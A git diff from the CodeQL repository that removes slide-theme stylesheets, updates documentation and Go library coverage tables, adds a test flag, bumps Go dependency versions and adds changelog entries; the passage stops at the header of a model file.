.to-build { - opacity: 0; - } - - .build-fade { - opacity: 0.3; - - &:hover { - opacity: 1.0; - } - } -} - -.popup .next .build { - .to-build { - opacity: 1; - } - - .build-fade { - opacity: 1; - } -} - -/* Pretty print */ - -.prettyprint .str, /* string content */ -.prettyprint .atv { /* a markup attribute value */ - color: $brand-green-secondary2; //rgb(0, 138, 53); -} -.prettyprint .kwd, /* a keyword */ -.prettyprint .tag { /* a markup tag name */ - color: rgb(0, 102, 204); -} -.prettyprint .com { /* a comment */ - color: $gray-3; //rgb(127, 127, 127); - font-style: italic; -} -.prettyprint .lit { /* a literal value */ - color: rgb(127, 0, 0); -} -.prettyprint .pun, /* punctuation, lisp open bracket, lisp close bracket */ -.prettyprint .opn, -.prettyprint .clo { - color: $gray-4; //rgb(127, 127, 127); -} -.prettyprint .typ, /* a type name */ -.prettyprint .atn, /* a markup attribute name */ -.prettyprint .dec, -.prettyprint .var { /* a declaration; a variable name */ - color: $brand-red-secondary2; //rgb(127, 0, 127); -} -.prettyprint .pln { - color: $gray-4; -} - -.note { - position: absolute; - z-index: 100; - width: 100%; - height: 100%; - top: 0; - left: 0; - padding: 1em; - background: rgba(0, 0, 0, 0.3); - opacity: 0; - pointer-events: none; - @include flexbox; - @include flex-center-center; - @include border-radius($slide-border-radius); - - @include box-sizing(border-box); - @include transform(translateY($slide-height / 2));@include transition(all 0.4s ease-in-out); - - > section { - background: #fff; - @include border-radius($slide-border-radius); - @include box-shadow(0 0 10px $gray-3); - width: 60%; - padding: 2em; - } -} - -// Speaker notes only show the current slide. -.with-notes { - - &.popup { - - slides.layout-widescreen, - slides.layout-faux-widescreen { - slide { - &.next { - @include transform(translate3d($slide-width-widescreen / 2 + 140, 80px, 0) scale(0.35)); - } - .note { - @include transform(translate3d(300px, $slide-height + 100, 0) scale(1.5)); - } - } - } - - slide { - overflow: visible; - background: white; - @include transition(none); // No slide transition goodies when in presenter mode. - pointer-events: none; - @include transform-origin(0, 0); // For speaker note transition. - - &:not(.backdrop) { - @include transform(scale(0.6) translate3d(0.5em, 0.5em, 0)); - @include box-shadow(0 0 10px $gray-3); - } - - &.backdrop { - //@include background(linear-gradient($gray-1, white 30%, white 60%, $gray-1)); - @include background-image(radial-gradient(50% 50%, #b1dfff 0%, - $brand-blue 600px)); - } - - &.next { - @include transform(translate3d($slide-width / 2 + 120, 80px, 0) scale(0.35)); - opacity: 1 !important; - - .note { - display: none !important; // Prevents seeing notes if we go to previous slide. - } - } - } - - .note { - width: 109%; - height: $slide-height / 2 - 90; - background: $gray-1; - padding: 0; - - @include box-shadow(0 0 10px $gray-3); - - @include transform(translate3d(250px, $slide-height + 100, 0) scale(1.5)); - @include transition(opacity 400ms ease-in-out); - - > section { - background: #fff; - @include border-radius($slide-border-radius); - height: 100%; - width: 100%; - @include box-sizing(border-box); - @include box-shadow(none); - overflow: auto; - padding: 1em; - } - } - } - - .note { - opacity: 1; - @include transform(translateY(0)); - pointer-events: auto; // Allow people to do things like open links embedded in the speaker notes. - } -} - -.source { - font-size: 14px; - color: $gray-2; - position: absolute; - bottom: $slide-top-bottom-padding + 30px; - left: $slide-left-right-padding; -} - -.centered { - text-align: center; -} - -.reflect { - -webkit-box-reflect: below 3px -webkit-linear-gradient(rgba(255,255,255,0) 85%, white 150%); - -moz-box-reflect: below 3px -moz-linear-gradient(rgba(255,255,255,0) 85%, white 150%); - -o-box-reflect: below 3px -o-linear-gradient(rgba(255,255,255,0) 85%, white 150%); - -ms-box-reflect: below 3px -ms-linear-gradient(rgba(255,255,255,0) 85%, white 150%); - box-reflect: below 3px linear-gradient(rgba(255,255,255,0) 85%, white 150%); -} - -.flexbox { - @include flexbox; -} - -.flexbox.vcenter { - @include flex-center-center; - height: 100%; - width: 100%; -} - -.flexbox.vleft { - @include flex-left-center; - height: 100%; - width: 100%; -} - -.flexbox.vright { - @include flex-right-center; - height: 100%; - width: 100%; -} - -.auto-fadein { - @include transition(opacity 0.6s ease-in 1s); - opacity: 0; -} - -/* Clickable/tappable areas */ -.slide-area { - z-index: 1000; - - position: absolute; - left: 0; - top: 0; - width: $slide-tap-area-width; - height: $slide-height; - - left: 50%; - top: 50%; - - cursor: pointer; - margin-top: -$slide-height / 2; - - //@include highlight-color(rgba(51, 51, 51, 0.5)); -} -#prev-slide-area { - margin-left: -$slide-width-widescreen / 2; - //@include border-radius(10px 0 0 10px); - //@include box-shadow(-5px 0 10px #222 inset); -} -#next-slide-area { - margin-left: $slide-width / 2; - //@include border-radius(0 10px 10px 0); - //@include box-shadow(5px 0 10px #222 inset); -} - -/* ===== SLIDE CONTENT ===== */ -.logoslide { - img { - width: 383px; - height: 92px; - } -} - -.segue { - padding: $slide-left-right-padding $slide-left-right-padding * 2; - - h2 { - color: $gray-1; - font-size: 60px; - } - h3 { - color: $gray-1; - line-height: 2.8; - } - hgroup { - position: absolute; - bottom: 225px; - } -} - -.thank-you-slide { - background: $brand-blue !important; - color: white; - - h2 { - font-size: 60px; - color: inherit; - } - - article > p { - margin-top: 2em; - font-size: 20pt; - } - - > p { - position: absolute; - bottom: $slide-top-bottom-padding * 2; - font-size: 24pt; - line-height: 1.3; - } -} - -aside.gdbar { - height: 97px; - width: 215px; - position: absolute; - left: -1px; - top: 125px; - @include border-radius(0 10px 10px 0); - @include background(linear-gradient(left, $gray-1, $gray-1) no-repeat); - @include background-size(0% 100%); - @include transition(all 0.5s ease-out 0.5s); /* Better to transition only on background-size, but not sure how to do that with the mixin. */ - - &.right { - right: 0; - left: -moz-initial; - left: initial; - top: ($slide-height / 2) - 96; /* 96 is height of gray icon bar */ - @include transform(rotateZ(180deg)); - - img { - @include transform(rotateZ(180deg)); - } - } - - &.bottom { - top: -moz-initial; - top: initial; - bottom: $slide-left-right-padding; - } - - img { - width: 85px; - height: 85px; - position: absolute; - right: 0; - margin: 8px 15px; - } -} - -.title-slide { - - hgroup { - bottom: 100px; - - h1 { - font-size: 65px; - line-height: 1.4; - letter-spacing: -3px; - color: $gray-4; - } - - h2 { - font-size: 34px; - color: $gray-2; - font-weight: inherit; - } - - p { - font-size: 20px; - color: $gray-3; - line-height: 1.3; - margin-top: 2em; - } - } -} - -.quote { - color: $gray-1; - - .author { - font-size: 24px; - position: absolute; - bottom: 80px; - line-height: 1.4; - } -} - -[data-config-contact] { - a { - color: rgb(255, 255, 255); - border-bottom: none; - } - span { - width: 115px; - display: inline-block; - } -} - -.overview { - - &.popup { - .note { - display: none !important; - } - } - - slides { - slide { - &.backdrop { - display: none !important; - } - - display: block; - cursor: pointer; - opacity: 0.5; - pointer-events: auto !important; - - @include backdrop(); - - &.far-past, - &.past, - &.next, - &.far-next, - &.far-past { - opacity: 0.5; - display: block; - } - - &.current { - opacity: 1; - } - } - } - - .slide-area { - display: none; - } -} - -@media print { - slides { - slide { - display: block !important; - position: relative; - @include backdrop(); - @include transform(none !important); - width: 100%; - height: 100%; - page-break-after:always; - top: auto !important; - left: auto !important; - margin-top: 0 !important; - margin-left: 0 !important; - opacity: 1 !important; - color: #555; - - &.far-past, - &.past, - &.next, - &.far-next, - &.far-past, - &.current { - opacity: 1 !important; - display: block !important; - } - - .build { - > * { - @include transition(none); - } - - .to-build, - .build-fade { - opacity: 1; - } - } - - .auto-fadein { - opacity: 1 !important; - } - - &.backdrop { - display: none !important; - } - - table.rows { - border-right: 0; - } - } - - slide[hidden] { - display: none !important; - } - } - - .slide-area { - display: none; - } - - .reflect { - -webkit-box-reflect: none; - -moz-box-reflect: none; - -o-box-reflect: none; - -ms-box-reflect: none; - box-reflect: none; - } - - pre, code { - font-family: monospace !important; - } -} diff --git a/docs/codeql/ql-training/_static-training/slides-semmle-2/static/theme/scss/hieroglyph.scss b/docs/codeql/ql-training/_static-training/slides-semmle-2/static/theme/scss/hieroglyph.scss deleted file mode 100644 index e406085227b0..000000000000 --- a/docs/codeql/ql-training/_static-training/slides-semmle-2/static/theme/scss/hieroglyph.scss +++ /dev/null @@ -1,100 +0,0 @@ -@import "compass/css3/background-size"; - -@import "variables"; - -ol { - margin-left: 1.2em; - margin-bottom: 1em; - position: relative; - list-style: decimal; - - li { - margin-bottom: 0.5em; - - ol { - margin-left: 2em; - margin-bottom: 0; - list-style: decimal; - - li:before { - font-weight: 600; - } - } - } - - ol { - margin-top: .5em; - list-style: decimal; - - } -} - -slide.title-image { - - padding-right: 0px; - - hgroup { - position: static !important; - - margin-top: 35%; - padding-left: 30px; - - background: rgba(255, 255, 255, 0.7); - - border-top-left-radius: $slide-border-radius; - -webkit-border-top-left-radius: $slide-border-radius; - -moz-border-top-left-radius: $slide-border-radius; - -o-border-top-left-radius: $slide-border-radius; - } - - hgroup + article { - background: rgba(255, 255, 255, 0.7); - - margin-top: 0px; - padding-left: 30px; - - border-bottom-left-radius: $slide-border-radius; - -webkit-border-bottom-left-radius: $slide-border-radius; - -moz-border-bottom-left-radius: $slide-border-radius; - -o-border-bottom-left-radius: $slide-border-radius; - } - - h1 { - color: #222; - font-size: 3.2em; - - line-height: 1.5em; - font-weight: 500; - } - - div.figure { - - img { - position: absolute; - left: 0; - top: 0; - min-width: 100%; - min-height: 100%; - - border-radius: $slide-border-radius; - -o-border-radius: $slide-border-radius; - -moz-border-radius: $slide-border-radius; - -webkit-border-radius: $slide-border-radius; - - z-index: -1; - } - - .caption { - color: black; - background: rgba(255, 255, 255, 0.25); - padding: 0 5px; - border-bottom-left-radius: $slide-border-radius; - border-top-right-radius: $slide-border-radius; - - position: absolute; - left: 0; - bottom: 0; - margin-bottom: 0; - } - } -} diff --git a/docs/codeql/ql-training/_static-training/slides-semmle-2/static/theme/scss/io2013.scss b/docs/codeql/ql-training/_static-training/slides-semmle-2/static/theme/scss/io2013.scss deleted file mode 100644 index c728cfbf56d9..000000000000 --- a/docs/codeql/ql-training/_static-training/slides-semmle-2/static/theme/scss/io2013.scss +++ /dev/null @@ -1,51 +0,0 @@ -@import "compass/css3/background-size"; - -@import "variables"; - -* { - line-height: 1.3; -} - -h2 { - font-weight: bold; -} -h2, h3 { - color: $gray-4; -} - -q, blockquote { - font-weight: bold; -} - -slides > slide { - color: $gray-4; - - &.title-slide { - &:after { - content: ''; - background: url(../../images/io2013/google-io-lockup-1.png) no-repeat 100% 50%; - @include background-size(contain); - position: absolute; - bottom: $slide-top-bottom-padding + 40; - right: $slide-top-bottom-padding; - width: 100%; - height: 90px; - } - - hgroup { - h1 { - font-weight: bold; - line-height: 1.1; - } - h2, p { - color: $gray-4; - } - h2 { - margin-top: 0.25em; - } - p { - margin-top: 3em; - } - } - } -} \ No newline at end of file diff --git a/docs/codeql/ql-training/_static-training/slides-semmle-2/static/theme/scss/phone.scss b/docs/codeql/ql-training/_static-training/slides-semmle-2/static/theme/scss/phone.scss deleted file mode 100644 index c6a40432470f..000000000000 --- a/docs/codeql/ql-training/_static-training/slides-semmle-2/static/theme/scss/phone.scss +++ /dev/null @@ -1,35 +0,0 @@ -@import "compass/css3/transition"; - - -/*Smartphones (portrait and landscape) ----------- */ -/*@media only screen -and (min-width : 320px) -and (max-width : 480px) { - -}*/ - -/* Smartphones (portrait) ----------- */ -//@media only screen and (max-device-width: 480px) { -/* Styles */ -//$slide-width: 350px; -//$slide-height: 500px; - -slides > slide { -/* width: $slide-width !important; - height: $slide-height !important; - margin-left: -$slide-width / 2 !important; - margin-top: -$slide-height / 2 !important; -*/ - // Don't do full slide transitions on mobile. - -webkit-transition: none !important; // Bug in compass? Not sure why the below is not working - @include transition(none !important); -} - -//} - -/* iPhone 4 ----------- */ -@media -only screen and (-webkit-min-device-pixel-ratio : 1.5), -only screen and (min-device-pixel-ratio : 1.5) { -/* Styles */ -} \ No newline at end of file diff --git a/docs/codeql/ql-training/_static-training/slides-semmle-2/theme.conf b/docs/codeql/ql-training/_static-training/slides-semmle-2/theme.conf deleted file mode 100644 index fa2b35a18ca6..000000000000 --- a/docs/codeql/ql-training/_static-training/slides-semmle-2/theme.conf +++ /dev/null @@ -1,15 +0,0 @@ -[theme] -inherit = basic -stylesheet = slides.css - -[options] -custom_css = -custom_js = - -subtitle = -use_builds = true -use_prettify = true -enable_slide_areas = true -enable_touch = true -favicon = '' -presenters = \ No newline at end of file diff --git a/docs/codeql/reusables/supported-versions-compilers.rst b/docs/codeql/reusables/supported-versions-compilers.rst index d4e3d8f10584..92821d9556f7 100644 --- a/docs/codeql/reusables/supported-versions-compilers.rst +++ b/docs/codeql/reusables/supported-versions-compilers.rst @@ -25,7 +25,7 @@ Python [8]_,"2.7, 3.5, 3.6, 3.7, 3.8, 3.9, 3.10, 3.11, 3.12, 3.13",Not applicable,``.py`` Ruby [9]_,"up to 3.3",Not applicable,"``.rb``, ``.erb``, ``.gemspec``, ``Gemfile``" Swift [10]_,"Swift 5.4-6.0","Swift compiler","``.swift``" - TypeScript [11]_,"2.6-5.7",Standard TypeScript compiler,"``.ts``, ``.tsx``, ``.mts``, ``.cts``" + TypeScript [11]_,"2.6-5.8",Standard TypeScript compiler,"``.ts``, ``.tsx``, ``.mts``, ``.cts``" .. container:: footnote-group diff --git a/docs/codeql/writing-codeql-queries/metadata-for-codeql-queries.rst b/docs/codeql/writing-codeql-queries/metadata-for-codeql-queries.rst index 34907e3910ca..e5288ac5c440 100644 --- a/docs/codeql/writing-codeql-queries/metadata-for-codeql-queries.rst +++ b/docs/codeql/writing-codeql-queries/metadata-for-codeql-queries.rst @@ -30,6 +30,8 @@ The following properties are supported by all query files: +-----------------------+---------------------------+-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+ | ``@id`` | ```` | A sequence of words composed of lowercase letters or digits, delimited by ``/`` or ``-``, identifying and classifying the query. Each query must have a **unique** ID. To ensure this, it may be helpful to use a fixed structure for each ID. For example, the standard CodeQL queries have the following format: ``/``. | +-----------------------+---------------------------+-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+ +| ``@previous-id`` | ```` | Indicates that query results were previously reported on a different query. The previous id should be a sequence of words composed of lowercase letters or digits, delimited by ``/`` or ``-``, identifying and classifying the previous query. | ++-----------------------+---------------------------+-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+ | ``@kind`` | | ``problem`` | Identifies the query is an alert (``@kind problem``) or a path (``@kind path-problem``). For more information on these query types, see ":doc:`About CodeQL queries `." | | | | ``path-problem`` | | +-----------------------+---------------------------+-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+ diff --git a/docs/query-metadata-style-guide.md b/docs/query-metadata-style-guide.md index 3350111db22e..0030d0073238 100644 --- a/docs/query-metadata-style-guide.md +++ b/docs/query-metadata-style-guide.md @@ -93,6 +93,10 @@ Note, `@id` properties should be consistent for queries that highlight the same * `@id java/tainted-format-string` * `@id cpp/tainted-format-string` +#### Query previous ID `@previous-id` + +Queries with alerts that used to be reported on a different query should also have an `@previous-id` property to refer back to the query where the alerts were originally reported. For example, if alerts from `java/query-one` are now reported on `java/query-two`, then the metadata for `java/query-two` should contain: `@previous-id java/query-one`. + ### Query type `@kind` @@ -113,7 +117,7 @@ Alert queries (`@kind problem` or `path-problem`) support two further properties * `medium` * `high` * `very-high` -* `@problem.severity`–defines the likelihood that an alert, either security-related or not, causes an actual problem such as incorrect program behavior: +* `@problem.severity`–defines the likelihood that an alert, either security-related or not, causes an actual problem such as incorrect program behavior: * `error`–an issue that is likely to cause incorrect program behavior, for example a crash or vulnerability. * `warning`–an issue that indicates a potential problem in the code, or makes the code fragile if another (unrelated) part of code is changed. * `recommendation`–an issue where the code behaves correctly, but it could be improved. diff --git a/go/Makefile b/go/Makefile index 821ab49fc2a0..b32b61bc5c38 100644 --- a/go/Makefile +++ b/go/Makefile @@ -52,9 +52,9 @@ ql/lib/go.dbscheme.stats: ql/lib/go.dbscheme build/stats/src.stamp extractor codeql dataset measure -o $@ build/stats/database/db-go test: all build/testdb/check-upgrade-path - codeql test run -j0 ql/test --search-path .. --consistency-queries ql/test/consistency --compilation-cache=$(cache) + codeql test run -j0 ql/test --search-path .. --consistency-queries ql/test/consistency --compilation-cache=$(cache) --dynamic-join-order-mode=$(rtjo) # use GOOS=linux because GOOS=darwin GOARCH=386 is no longer supported - env GOOS=linux GOARCH=386 codeql$(EXE) test run -j0 ql/test/query-tests/Security/CWE-681 --search-path .. --consistency-queries ql/test/consistency --compilation-cache=$(cache) + env GOOS=linux GOARCH=386 codeql$(EXE) test run -j0 ql/test/query-tests/Security/CWE-681 --search-path .. --consistency-queries ql/test/consistency --compilation-cache=$(cache) --dynamic-join-order-mode=$(rtjo) cd extractor; $(BAZEL) test ... bash extractor-smoke-test/test.sh || (echo "Extractor smoke test FAILED"; exit 1) diff --git a/go/actions/test/action.yml b/go/actions/test/action.yml index 9ab7f9becfb0..667ee4751ba9 100644 --- a/go/actions/test/action.yml +++ b/go/actions/test/action.yml @@ -9,6 +9,10 @@ inputs: description: Whether to run formatting, code and qhelp generation checks required: false default: false + dynamic-join-order-mode: + description: Value of the --dynamic-join-order-mode flag to pass to the codeql test command + required: false + default: "none" runs: using: composite steps: @@ -74,4 +78,4 @@ runs: shell: bash run: | cd go - make test cache="${{ steps.query-cache.outputs.cache-dir }}" + make test cache="${{ steps.query-cache.outputs.cache-dir }}" rtjo=${{ inputs.dynamic-join-order-mode }} diff --git a/go/documentation/library-coverage/coverage.csv b/go/documentation/library-coverage/coverage.csv index 38a7f900fe5e..d8091bbda648 100644 --- a/go/documentation/library-coverage/coverage.csv +++ b/go/documentation/library-coverage/coverage.csv @@ -21,7 +21,7 @@ errors,,,3,,,,,,,,,,,,,,,,,,,,,,,3, expvar,,,6,,,,,,,,,,,,,,,,,,,,,,,6, fmt,3,,16,,,,3,,,,,,,,,,,,,,,,,,,16, github.com/ChrisTrenkamp/goxpath,3,,,,,,,,,,,,,,,,,,3,,,,,,,, -github.com/Masterminds/squirrel,32,,,,,,,,,,,,,,32,,,,,,,,,,,, +github.com/Masterminds/squirrel,32,27,,,,,,,,,,,,,32,,,,,,27,,,,,, github.com/Sirupsen/logrus,145,,,,,,145,,,,,,,,,,,,,,,,,,,, github.com/antchfx/htmlquery,4,,,,,,,,,,,,,,,,,,4,,,,,,,, github.com/antchfx/jsonquery,4,,,,,,,,,,,,,,,,,,4,,,,,,,, @@ -33,8 +33,8 @@ github.com/beego/beego,142,68,42,,,,68,,10,,,,,,60,4,,,,,26,,,42,,42, github.com/caarlos0/env,,5,2,,,,,,,,,,,,,,,,,,,5,,,,1,1 github.com/clevergo/clevergo,1,,,,,,,,,,,,,,,,,1,,,,,,,,, github.com/codeskyblue/go-sh,4,,,4,,,,,,,,,,,,,,,,,,,,,,, -github.com/couchbase/gocb,8,,18,,,,,8,,,,,,,,,,,,,,,,,,18, -github.com/couchbaselabs/gocb,8,,18,,,,,8,,,,,,,,,,,,,,,,,,18, +github.com/couchbase/gocb,8,22,48,,,,,8,,,,,,,,,,,,,22,,,,,48, +github.com/couchbaselabs/gocb,8,22,48,,,,,8,,,,,,,,,,,,,22,,,,,48, github.com/crankycoder/xmlpath,2,,,,,,,,,,,,,,,,,,2,,,,,,,, github.com/cristalhq/jwt,1,,,,1,,,,,,,,,,,,,,,,,,,,,, github.com/davecgh/go-spew/spew,9,,,,,,9,,,,,,,,,,,,,,,,,,,, @@ -77,7 +77,7 @@ github.com/kataras/iris/server/web/context,6,,,,,,,,6,,,,,,,,,,,,,,,,,, github.com/kataras/jwt,5,,,,5,,,,,,,,,,,,,,,,,,,,,, github.com/kelseyhightower/envconfig,,6,,,,,,,,,,,,,,,,,,,,6,,,,, github.com/labstack/echo,3,12,2,,,,,,2,,,,,,,1,,,,,,,,12,,2, -github.com/lann/squirrel,32,,,,,,,,,,,,,,32,,,,,,,,,,,, +github.com/lann/squirrel,32,27,,,,,,,,,,,,,32,,,,,,27,,,,,, github.com/lestrrat-go/jwx,2,,,,2,,,,,,,,,,,,,,,,,,,,,, github.com/lestrrat-go/libxml2/parser,3,,,,,,,,,,,,,,,,,,3,,,,,,,, github.com/lestrrat/go-jwx/jwk,1,,,,1,,,,,,,,,,,,,,,,,,,,,, @@ -106,8 +106,8 @@ google.golang.org/protobuf/internal/encoding/text,,,1,,,,,,,,,,,,,,,,,,,,,,,1, google.golang.org/protobuf/internal/impl,,,2,,,,,,,,,,,,,,,,,,,,,,,2, google.golang.org/protobuf/proto,,,8,,,,,,,,,,,,,,,,,,,,,,,8, google.golang.org/protobuf/reflect/protoreflect,,,1,,,,,,,,,,,,,,,,,,,,,,,1, -gopkg.in/Masterminds/squirrel,32,,,,,,,,,,,,,,32,,,,,,,,,,,, -gopkg.in/couchbase/gocb,8,,18,,,,,8,,,,,,,,,,,,,,,,,,18, +gopkg.in/Masterminds/squirrel,32,27,,,,,,,,,,,,,32,,,,,,27,,,,,, +gopkg.in/couchbase/gocb,8,22,48,,,,,8,,,,,,,,,,,,,22,,,,,48, gopkg.in/glog,90,,,,,,90,,,,,,,,,,,,,,,,,,,, gopkg.in/go-jose/go-jose,3,,4,,2,1,,,,,,,,,,,,,,,,,,,,4, gopkg.in/go-xmlpath/xmlpath,2,,,,,,,,,,,,,,,,,,2,,,,,,,, diff --git a/go/documentation/library-coverage/coverage.rst b/go/documentation/library-coverage/coverage.rst index 90a3c34a940d..2f45f4b7e339 100644 --- a/go/documentation/library-coverage/coverage.rst +++ b/go/documentation/library-coverage/coverage.rst @@ -10,8 +10,8 @@ Go framework & library support `Afero `_,``github.com/spf13/afero*``,,,34 `Bun `_,``github.com/uptrace/bun*``,,,63 `CleverGo `_,"``clevergo.tech/clevergo*``, ``github.com/clevergo/clevergo*``",,,2 - `Couchbase official client(gocb) `_,"``github.com/couchbase/gocb*``, ``gopkg.in/couchbase/gocb*``",,36,16 - `Couchbase unofficial client `_,``github.com/couchbaselabs/gocb*``,,18,8 + `Couchbase official client(gocb) `_,"``github.com/couchbase/gocb*``, ``gopkg.in/couchbase/gocb*``",44,96,16 + `Couchbase unofficial client `_,``github.com/couchbaselabs/gocb*``,22,48,8 `Echo `_,``github.com/labstack/echo*``,12,2,3 `Fiber `_,``github.com/gofiber/fiber*``,,,5 `Fosite `_,``github.com/ory/fosite*``,,,2 @@ -31,7 +31,7 @@ Go framework & library support `MongoDB Go Driver `_,``go.mongodb.org/mongo-driver*``,11,5,14 `Revel `_,"``github.com/revel/revel*``, ``github.com/robfig/revel*``",46,20,4 `SendGrid `_,``github.com/sendgrid/sendgrid-go*``,,1, - `Squirrel `_,"``github.com/Masterminds/squirrel*``, ``github.com/lann/squirrel*``, ``gopkg.in/Masterminds/squirrel``",,,96 + `Squirrel `_,"``github.com/Masterminds/squirrel*``, ``github.com/lann/squirrel*``, ``gopkg.in/Masterminds/squirrel``",81,,96 `Standard library `_,"````, ``archive/*``, ``bufio``, ``bytes``, ``cmp``, ``compress/*``, ``container/*``, ``context``, ``crypto``, ``crypto/*``, ``database/*``, ``debug/*``, ``embed``, ``encoding``, ``encoding/*``, ``errors``, ``expvar``, ``flag``, ``fmt``, ``go/*``, ``hash``, ``hash/*``, ``html``, ``html/*``, ``image``, ``image/*``, ``index/*``, ``io``, ``io/*``, ``log``, ``log/*``, ``maps``, ``math``, ``math/*``, ``mime``, ``mime/*``, ``net``, ``net/*``, ``os``, ``os/*``, ``path``, ``path/*``, ``plugin``, ``reflect``, ``reflect/*``, ``regexp``, ``regexp/*``, ``slices``, ``sort``, ``strconv``, ``strings``, ``sync``, ``sync/*``, ``syscall``, ``syscall/*``, ``testing``, ``testing/*``, ``text/*``, ``time``, ``time/*``, ``unicode``, ``unicode/*``, ``unsafe``, ``weak``",52,609,104 `XORM `_,"``github.com/go-xorm/xorm*``, ``xorm.io/xorm*``",,,68 `XPath `_,``github.com/antchfx/xpath*``,,,4 @@ -74,5 +74,5 @@ Go framework & library support `yaml `_,``gopkg.in/yaml*``,,9, `zap `_,``go.uber.org/zap*``,,11,33 Others,``github.com/kanikanema/gorqlite``,8,2,24 - Totals,,494,958,1556 + Totals,,641,1048,1556 diff --git a/go/extractor/go.mod b/go/extractor/go.mod index 77a22b45f5c1..de799a83fcab 100644 --- a/go/extractor/go.mod +++ b/go/extractor/go.mod @@ -9,8 +9,8 @@ toolchain go1.24.0 // when adding or removing dependencies, run // bazel mod tidy require ( - golang.org/x/mod v0.23.0 - golang.org/x/tools v0.30.0 + golang.org/x/mod v0.24.0 + golang.org/x/tools v0.31.0 ) -require golang.org/x/sync v0.11.0 // indirect +require golang.org/x/sync v0.12.0 // indirect diff --git a/go/extractor/go.sum b/go/extractor/go.sum index 68d0914a62a0..09ebfb8a2a8c 100644 --- a/go/extractor/go.sum +++ b/go/extractor/go.sum @@ -1,8 +1,8 @@ github.com/google/go-cmp v0.6.0 h1:ofyhxvXcZhMsU5ulbFiLKl/XBFqE1GSq7atu8tAmTRI= github.com/google/go-cmp v0.6.0/go.mod h1:17dUlkBOakJ0+DkrSSNjCkIjxS6bF9zb3elmeNGIjoY= -golang.org/x/mod v0.23.0 h1:Zb7khfcRGKk+kqfxFaP5tZqCnDZMjC5VtUBs87Hr6QM= -golang.org/x/mod v0.23.0/go.mod h1:6SkKJ3Xj0I0BrPOZoBy3bdMptDDU9oJrpohJ3eWZ1fY= -golang.org/x/sync v0.11.0 h1:GGz8+XQP4FvTTrjZPzNKTMFtSXH80RAzG+5ghFPgK9w= -golang.org/x/sync v0.11.0/go.mod h1:Czt+wKu1gCyEFDUtn0jG5QVvpJ6rzVqr5aXyt9drQfk= -golang.org/x/tools v0.30.0 h1:BgcpHewrV5AUp2G9MebG4XPFI1E2W41zU1SaqVA9vJY= -golang.org/x/tools v0.30.0/go.mod h1:c347cR/OJfw5TI+GfX7RUPNMdDRRbjvYTS0jPyvsVtY= +golang.org/x/mod v0.24.0 h1:ZfthKaKaT4NrhGVZHO1/WDTwGES4De8KtWO0SIbNJMU= +golang.org/x/mod v0.24.0/go.mod h1:IXM97Txy2VM4PJ3gI61r1YEk/gAj6zAHN3AdZt6S9Ww= +golang.org/x/sync v0.12.0 h1:MHc5BpPuC30uJk597Ri8TV3CNZcTLu6B6z4lJy+g6Jw= +golang.org/x/sync v0.12.0/go.mod h1:1dzgHSNfp02xaA81J2MS99Qcpr2w7fw1gpm99rleRqA= +golang.org/x/tools v0.31.0 h1:0EedkvKDbh+qistFTd0Bcwe/YLh4vHwWEkiI0toFIBU= +golang.org/x/tools v0.31.0/go.mod h1:naFTU+Cev749tSJRXJlna0T3WxKvb1kWEx15xA4SdmQ= diff --git a/go/ql/consistency-queries/CHANGELOG.md b/go/ql/consistency-queries/CHANGELOG.md index 72016e3f662f..b20db0162311 100644 --- a/go/ql/consistency-queries/CHANGELOG.md +++ b/go/ql/consistency-queries/CHANGELOG.md @@ -1,3 +1,7 @@ +## 1.0.20 + +No user-facing changes. + ## 1.0.19 No user-facing changes. diff --git a/go/ql/consistency-queries/change-notes/released/1.0.20.md b/go/ql/consistency-queries/change-notes/released/1.0.20.md new file mode 100644 index 000000000000..5fc76269ab27 --- /dev/null +++ b/go/ql/consistency-queries/change-notes/released/1.0.20.md @@ -0,0 +1,3 @@ +## 1.0.20 + +No user-facing changes. diff --git a/go/ql/consistency-queries/codeql-pack.release.yml b/go/ql/consistency-queries/codeql-pack.release.yml index e15e0d267b0a..7af2d1347ffc 100644 --- a/go/ql/consistency-queries/codeql-pack.release.yml +++ b/go/ql/consistency-queries/codeql-pack.release.yml @@ -1,2 +1,2 @@ --- -lastReleaseVersion: 1.0.19 +lastReleaseVersion: 1.0.20 diff --git a/go/ql/consistency-queries/qlpack.yml b/go/ql/consistency-queries/qlpack.yml index c3b83cd73a5c..82bc42c23786 100644 --- a/go/ql/consistency-queries/qlpack.yml +++ b/go/ql/consistency-queries/qlpack.yml @@ -1,5 +1,5 @@ name: codeql-go-consistency-queries -version: 1.0.19 +version: 1.0.20 groups: - go - queries diff --git a/go/ql/lib/CHANGELOG.md b/go/ql/lib/CHANGELOG.md index 78bb56e662af..27ad374e3747 100644 --- a/go/ql/lib/CHANGELOG.md +++ b/go/ql/lib/CHANGELOG.md @@ -1,3 +1,11 @@ +## 4.2.2 + +### Minor Analysis Improvements + +* We no longer track taint into a `sync.Map` via the key of a key-value pair, since we do not model any way in which keys can be read from a `sync.Map`. +* `database` source models have been added for v1 and v2 of the `github.com/couchbase/gocb` package. +* Added `database` source models for the `github.com/Masterminds/squirrel` ORM package. + ## 4.2.1 No user-facing changes. diff --git a/go/ql/lib/change-notes/released/4.2.2.md b/go/ql/lib/change-notes/released/4.2.2.md new file mode 100644 index 000000000000..d710ac69f69d --- /dev/null +++ b/go/ql/lib/change-notes/released/4.2.2.md @@ -0,0 +1,7 @@ +## 4.2.2 + +### Minor Analysis Improvements + +* We no longer track taint into a `sync.Map` via the key of a key-value pair, since we do not model any way in which keys can be read from a `sync.Map`. +* `database` source models have been added for v1 and v2 of the `github.com/couchbase/gocb` package. +* Added `database` source models for the `github.com/Masterminds/squirrel` ORM package. diff --git a/go/ql/lib/codeql-pack.release.yml b/go/ql/lib/codeql-pack.release.yml index 38ea9976fccd..18bc07709932 100644 --- a/go/ql/lib/codeql-pack.release.yml +++ b/go/ql/lib/codeql-pack.release.yml @@ -1,2 +1,2 @@ --- -lastReleaseVersion: 4.2.1 +lastReleaseVersion: 4.2.2 diff --git a/go/ql/lib/ext/github.com.couchbase.gocb.model.yml b/go/ql/lib/ext/github.com.couchbase.gocb.model.yml index d17b53dd6da9..d485c5a25286 100644 --- a/go/ql/lib/ext/github.com.couchbase.gocb.model.yml +++ b/go/ql/lib/ext/github.com.couchbase.gocb.model.yml 